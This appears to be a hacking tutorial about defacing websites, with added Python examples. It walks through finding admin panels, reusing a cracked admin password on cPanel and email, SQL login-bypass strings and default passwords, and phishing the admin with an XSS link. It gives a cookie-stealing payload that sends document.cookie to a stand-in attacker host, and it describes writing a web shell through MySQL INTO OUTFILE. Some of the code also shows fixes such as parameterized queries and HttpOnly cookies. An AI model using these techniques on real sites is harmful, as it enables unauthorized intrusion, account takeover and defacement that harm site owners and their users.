Many of us try to hack sites every day, and most of the time we fail.
But there are some people with a real talent for hacking just about any site, and we think "GOD ... I want to be like him."
This happens to all of us ... right?
But the thing that irritates us most is when a PRO hacker cannot hack a site, and the same site gets hacked by a new hacker who has only just started learning, and we wonder "how the hell did he do it?"
This, my friend, is where you beat the PRO by being a noob.
Here we will discuss the very small mistakes site admins make that lead to a site being defaced ...
1) Many of us are familiar with SQL injection, and a lot of the time we inject the site and get the admin password, but we cannot go further because we do not know the admin panel location. Here are some ways to find the admin panel:
a) First of all, check whether a robots.txt file exists and, if it does, see whether an admin link is in there. If you cannot find any admin-related folder/file, then open every file/folder the admin has put under Disallow, because there must be something in there the admin wants to hide from us. (robots.txt is only a request to crawlers; it hides nothing from anyone who reads it directly at /robots.txt.)
b) If the robots.txt method does not work, then crawl the site. Sometimes the admin puts images or uploads in the admin folder itself, and from those paths (for example an image src pointing into the admin directory) we can get the admin folder.
c) As a third try, use some admin finder tools. Use Havij or Admin Finder Pro or something else that can brute-force admin folder/file names against a wordlist. This does not work every time, but it is worth a shot.
d) Sometimes the admin is really smart and blocks every possible way to find the admin link. But he still makes mistakes. There is a golden rule in security, "NEVER USE THE SAME PASSWORD FOR TWO LOGINS", but most admins ignore it. What he does is keep the same password for the admin panel and for cPanel. So check whether cPanel is there (by default it listens on ports 2082/2083) and, if it is, try the admin password there. Also, if you find an email address on the site, try that password on the email account too. Who knows, the password may work, and from his mails you may get root passwords if the site is a hosting site; it has worked for me many times.
e) If the site is vulnerable to SQL injection and the admin is not using a standard CMS like WordPress or Joomla, then also try SQL login bypasses such as ' OR ''=' or ' OR 1=1-- in the username/password fields, and so on. These only work when the login script builds its query by string concatenation; a parameterized query treats the whole string as the password and the bypass fails. Also try some common passwords like admin:admin, password, 123456, 12345678, pass123, password123, root, toor, r00t, t00r, nimda (admin reversed).
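For step 1a, here is a small robots.txt reader that pulls out every Disallow entry per User-agent group and puts the admin-looking paths first. This is an added example, not code from the post; the robots.txt text and the keyword list ADMIN_HINTS are constructed for the demo. To run it against a live site, fetch /robots.txt from the target and pass the body to parse_robots.

```python
"""Added example for 1a: extract Disallow paths from robots.txt and rank the
ones that look like an admin area. The sample text below is constructed."""
from __future__ import annotations

SAMPLE_ROBOTS = """\
# constructed sample robots.txt
User-agent: *
Disallow: /cgi-bin/
Disallow: /old_backup/
Disallow: /manage-site/
Allow: /public/
Sitemap: http://example.invalid/sitemap.xml

User-agent: Googlebot
Disallow: /tmp/
"""

# Constructed keyword list; extend it with whatever the site's language uses.
ADMIN_HINTS = ("admin", "manage", "panel", "login", "cpanel", "backup", "private")


def parse_robots(text: str) -> dict[str, list[str]]:
    """Map each User-agent to the Disallow paths of its group.

    A group is one or more User-agent lines followed by rules; the next
    User-agent line after a rule starts a new group. Comments ('#') and
    blank lines are ignored, and 'Disallow:' with no path disallows nothing.
    """
    groups: dict[str, list[str]] = {}
    agents: list[str] = []
    seen_rule = False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        field, _, value = line.partition(":")
        field, value = field.strip().lower(), value.strip()
        if field == "user-agent":
            if seen_rule:
                agents, seen_rule = [], False
            agents.append(value)
            groups.setdefault(value, [])
        elif field == "disallow" and agents:
            seen_rule = True
            if value:
                for agent in agents:
                    groups[agent].append(value)
        elif field == "allow" and agents:
            seen_rule = True
        # Sitemap and unknown fields are not part of any group; skip them.
    return groups


def interesting_paths(groups: dict[str, list[str]]) -> list[str]:
    """All disallowed paths, deduplicated, admin-looking ones first."""
    paths = sorted({p for ps in groups.values() for p in ps})
    hinted = [p for p in paths if any(h in p.lower() for h in ADMIN_HINTS)]
    return hinted + [p for p in paths if p not in hinted]


if __name__ == "__main__":
    for path in interesting_paths(parse_robots(SAMPLE_ROBOTS)):
        print(path)
```

Every path this returns is worth opening in a browser, not just the hinted ones; the ranking only decides what you try first.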
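To see why the login bypasses in 1e work on hand-written login scripts and not on parameterized ones, here is an added example (not code from the post or from any real site). It builds an in-memory SQLite database with a constructed users table and runs the same two payloads against a concatenated query and a parameterized one; the concatenation bug behaves the same way in a PHP/MySQL login script.

```python
"""Added example for 1e: SQL login bypass against string concatenation,
and the parameterized query that defeats it. The users table is constructed."""
import sqlite3

# Constructed credentials. Stored in plaintext to keep the demo short; a real
# site should store password hashes, which is a separate fix from this one.
USERS = [("admin", "s3cretAdminPass"), ("editor", "editor2012")]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)", USERS)
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """The bug: user input is pasted into the SQL text, so a quote in the
    input ends the string literal and the rest becomes SQL."""
    query = (
        "SELECT id FROM users WHERE username = '" + username + "' "
        "AND password = '" + password + "'"
    )
    return conn.execute(query).fetchone() is not None


def safe_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """The fix: bound parameters are sent separately from the SQL text, so
    ' OR '1'='1 is compared as a (wrong) password, never parsed as SQL."""
    row = conn.execute(
        "SELECT id FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


def demo() -> dict:
    """Run both logins against real credentials and the two classic payloads."""
    conn = make_db()
    return {
        # password field:  ' OR '1'='1   ->  ... AND password = '' OR '1'='1'
        "vuln_or_bypass": vulnerable_login(conn, "admin", "' OR '1'='1"),
        # username field:  admin'--      ->  ... username = 'admin'-- (rest commented out)
        "vuln_comment_bypass": vulnerable_login(conn, "admin'--", "anything"),
        "vuln_real_creds": vulnerable_login(conn, "admin", "s3cretAdminPass"),
        "safe_or_bypass": safe_login(conn, "admin", "' OR '1'='1"),
        "safe_comment_bypass": safe_login(conn, "admin'--", "anything"),
        "safe_real_creds": safe_login(conn, "admin", "s3cretAdminPass"),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name:22} -> {'logged in' if ok else 'rejected'}")
```

Note that the bare ' OR 1=1 from the post, without a trailing comment marker, leaves an unmatched quote at the end of the query and just produces a syntax error; the -- (or # in MySQL) is what makes the trailing quote disappear.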
2) Many admins secure their sites against the major attacks but forget to patch low-impact vulnerabilities.
a) Many admins do not set a custom error page and keep the default application error message. It is not a critical mistake, but an application error message can disclose whether Apache is there, whether FrontPage extensions are there, version numbers, etc.
b) Many admins also take directory listing lightly. Sometimes it also leads to information leaks. So whenever you find directory listing enabled, look at every file in it (backups, config files, old copies of scripts); who knows, you may find more than what you were searching for.
c) Some small-site admins do not take XSS seriously. They underestimate the power of XSS. What you do, if you find XSS on his site, is send a simple mail to the admin saying you have found XSS here. Admins will surely open that link directly, and his cookie will be sent to you from that XSS (unless the session cookie is set with the HttpOnly flag, in which case document.cookie cannot read it and you get nothing). XSS tooling is also so developed now that there are tools like Xssexploit and xsstunel with which you can hijack the computers of people who visit the exploited link. Who knows, mail the XSS-exploited link to the admin saying you found porn on his site at this link; he will surely open it and you get his computer ;)
d) Some misconfigurations lead to local path disclosure, and the admin thinks, what can a hacker do with my local path? But my dear friend ... a hacker can do anything with any information. There is a clause in MySQL called INTO OUTFILE that writes the result of a SELECT to a file on the database server; through an SQL injection you can use it to write a web shell straight into the web root, and the disclosed local path is exactly what tells you where the web root is on disk. A few things have to line up for it: the MySQL user the site connects as must have the FILE privilege, secure_file_priv must not restrict where files may be written, the target directory must be writable by the MySQL process, and the file must not already exist (INTO OUTFILE refuses to overwrite). Here is a video explaining how:
http://www.youtube.com/watch?v=9T28FC6cny8
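For point 2c, here is an added example (not code from the post) of the reflected XSS that leaks a cookie and the two fixes that stop it: HTML-escaping the reflected value, and setting the session cookie HttpOnly so document.cookie cannot read it. The page template, the parameter name, the cookie name PHPSESSID and the attacker host attacker.invalid are all constructed for the demo.

```python
"""Added example for 2c: reflected XSS cookie theft, escaping, and HttpOnly.
All names and the payload below are constructed for the demo."""
import html
from http.cookies import SimpleCookie

# Constructed payload of the kind the post describes: when the admin opens the
# link, the browser sends document.cookie to the attacker's host.
PAYLOAD = (
    '<script>new Image().src="http://attacker.invalid/c?"+document.cookie'
    "</script>"
)


def render_vulnerable(search: str) -> str:
    """The 2c bug: the search parameter is reflected into the HTML as-is."""
    return f"<h1>Results for {search}</h1>"


def render_escaped(search: str) -> str:
    """Fix 1: escape < > & " ' so the browser shows the payload as text."""
    return f"<h1>Results for {html.escape(search, quote=True)}</h1>"


def contains_script(page: str) -> bool:
    """True if the page still carries an executable <script> tag."""
    return "<script>" in page.lower()


def session_cookie_header(session_id: str, httponly: bool) -> str:
    """Fix 2: the Set-Cookie header for the session. With HttpOnly the cookie
    is still sent on every request, but script cannot read it, so even a
    successful XSS has nothing to exfiltrate."""
    jar = SimpleCookie()
    jar["PHPSESSID"] = session_id
    jar["PHPSESSID"]["path"] = "/"
    jar["PHPSESSID"]["httponly"] = httponly
    return jar.output(header="Set-Cookie:").strip()


def demo() -> dict:
    return {
        "vulnerable_page_executes": contains_script(render_vulnerable(PAYLOAD)),
        "escaped_page_executes": contains_script(render_escaped(PAYLOAD)),
        "cookie_header_plain": session_cookie_header("abc123", httponly=False),
        "cookie_header_httponly": session_cookie_header("abc123", httponly=True),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

HttpOnly only protects the cookie; the "hijack the visitor's computer" tooling mentioned above works through the script itself, so the escaping fix is the one that actually removes the XSS.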